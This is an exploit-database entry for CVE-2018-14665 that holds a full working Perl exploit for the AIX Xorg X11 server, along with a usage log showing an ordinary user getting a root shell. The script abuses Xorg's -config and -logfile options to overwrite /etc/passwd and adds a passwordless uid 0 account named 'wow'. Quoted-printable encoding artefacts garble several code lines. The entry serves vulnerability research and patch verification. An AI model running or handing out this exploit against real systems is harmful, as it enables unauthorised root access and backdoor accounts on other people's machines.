Xorg X11 Server (AIX) - Local Privilege Escalation



EKU-ID: 8194 CVE: 2018-14665 OSVDB-ID:
Author: 0xdono Published: 2018-12-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privile=
ges.=20
# All currently logged in users need to be included when /etc/passwd is ove=
rwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to ch=
ange user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX=
,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
#  $ oslevel -s
#  7100-04-00-0000
#  $ Xorg -version
# =20
#  X Window System Version 7.1.1
#  Release Date: 12 May 2006
#  X Protocol Version 11, Revision 0, Release 7.1.1
#  Build Operating System: AIX IBM
#  Current Operating System: AIX sovma470 1 7 00C3C6F54C00
#  Build Date: 07 July 2006
#          Before reporting problems, check http://wiki.x.org
#          to make sure that you have the latest version.
#  Module Loader present
#  $ id
#  uid=3D16500(nmyo) gid=3D1(staff)
#  $ perl aixxorg.pl
#  [+] AIX X11 server local root exploit
#  [-] Checking for Xorg and ksh93=20
#  [-] Opening /etc/passwd=20
#  [-] Retrieving currently logged in users=20
#  [-] Generating Xorg command=20
#  [-] Opening /tmp/wow.ksh=20
#  [-] Writing Xorg command to /tmp/wow.ksh=20
#  [-] Backing up /etc/passwd to /tmp/passwd.backup=20
#  [-] Making /tmp/wow.ksh executable=20
#  [-] Executing /tmp/wow.ksh=20
#  [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20
#  [-] Done=20
#  [+] 'su wow' for root shell=20
#  $ su wow
#  # id
#  uid=3D0(root) gid=3D0(system)
#  # whoami
#  root
 
#!/usr/bin/perl
print "[+] AIX X11 server local root exploit\n";
 
# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg =3D `command -v Xorg`);
if ($xorg eq ""){=20
    print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
    exit;
}
 
# Check ksh93 is in path
chomp($ksh =3D `command -v ksh93`);
if ($ksh eq ""){
    print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
    exit;
}
 
# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array =3D <$passwd_fh>);
close($passwd_fh);
 
# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users =3D `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);
 
# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd =3D '';
foreach my $user (@users)
{
    $user .=3D ":";
    foreach my $line (@passwd_array)
    {
        if (index($line, $user) =3D=3D 0) {
            $users_logged_in_passwd =3D $users_logged_in_passwd . '\n' . $l=
ine;
        }
    }
}
 
# Use '-config' as '-fp' (which is used in the original BSD exploit) is not=
 written to log
print "[-] Generating Xorg command \n";
$blob =3D '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/us=
r/bin/ksh\n#' . '\'';
 
print "[-] Opening /tmp/wow.ksh \n";=09=09
open($fr, '>', "/tmp/wow.ksh");
 
# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1  > /dev/null 2>&1 \n";
close $fr;
 
# Backup passwd=20
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");
 
# Make script executable and run it
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");
 
# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result =3D `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0=
::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;
 
print "[-] Done \n";
print "[+] 'su wow' for root shell \n";